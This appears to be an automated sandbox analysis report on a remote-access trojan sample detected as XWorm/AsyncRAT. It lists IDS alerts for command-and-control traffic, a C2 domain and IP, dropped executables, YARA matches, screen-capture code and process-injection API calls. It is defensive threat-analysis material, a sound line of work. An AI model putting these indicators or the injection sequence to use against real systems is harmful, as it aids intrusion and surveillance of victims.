Source: Traffic Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 147.185.221.20:36125 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49732 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49732 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 147.185.221.20:36125 -> 192.168.2.4:49732
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 147.185.221.20:36125 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49731 -> 147.185.221.20:36125
Source: Traffic Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 147.185.221.20:36125 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49731 -> 147.185.221.20:36125
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: session-chief.gl.at.ply.gg
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 147.185.221.20 ports 1,2,3,5,6,36125
Yara detected Generic Downloader
Source: Yara match File source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 147.185.221.20:36125
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 147.185.221.20 147.185.221.20
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: session-chief.gl.at.ply.gg
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: svchost.exe, 00000025.00000002.2953015111.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1899628825.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000002.2951243071.0000026EF4C21000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000007.00000000.1744351768.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, x4host.exe.0.dr, x4usb.exe.2.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3F15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: svchost.exe, 00000025.00000000.1899628825.0000026EF4C2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000025.00000000.1899835829.0000026EF4C6A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744179091.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744351768.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2972627586.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.1887369836.00000202C024A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000011.00000000.1809587946.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: x433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 00000007.00000000.1744669291.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2983021045.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2984029679.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744519528.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744669291.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2273612789.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 0000001A.00000000.1837012178.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3027964125.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 0000001A.00000000.1837012178.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3027964125.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000023.00000002.3004729739.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1889283300.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1890717083.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3000838222.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.comSRD1%
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1743582596.0000021FE4E45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1782623387.0000021FFC1A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.comSRD1-
Source: svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com
Source: svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com3J
Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3022802035.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893559438.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comSRD13
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.16.dr String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: svchost.exe, 00000023.00000000.1892174406.0000020D262F8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3013226921.0000020D262F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3020897864.0000020D2655D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3011954167.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893396897.0000020D2655D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comSRD1#

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 2.2.x4host.exe.1bd60000.0.raw.unpack, RemoteDesktop.cs .Net Code: GetScreen

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.x433.exe.29b77d8.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.x4host.exe.fb0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1707631721.0000000000FB2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\x4usb.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\x4host.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Very long command line found
Source: unknown Process created: Commandline size = 5205
Contains functionality to call native functions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E0F2 NtWriteVirtualMemory, 3_2_00007FFD9B87E0F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E112 NtSetContextThread, 3_2_00007FFD9B87E112
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E132 NtResumeThread, 3_2_00007FFD9B87E132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E0D2 NtUnmapViewOfSection, 3_2_00007FFD9B87E0D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880FF4 NtResumeThread, 3_2_00007FFD9B880FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880F30 NtSetContextThread, 3_2_00007FFD9B880F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880A4E NtUnmapViewOfSection, 3_2_00007FFD9B880A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B87E122 NtSetContextThread, 3_2_00007FFD9B87E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B880C6D NtWriteVirtualMemory, 3_2_00007FFD9B880C6D
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140001868 OpenProcess,IsWow64Process,FindCloseChangeNotification,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle, 5_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC642964 NtEnumerateValueKey,NtEnumerateValueKey, 6_2_00000225DC642964
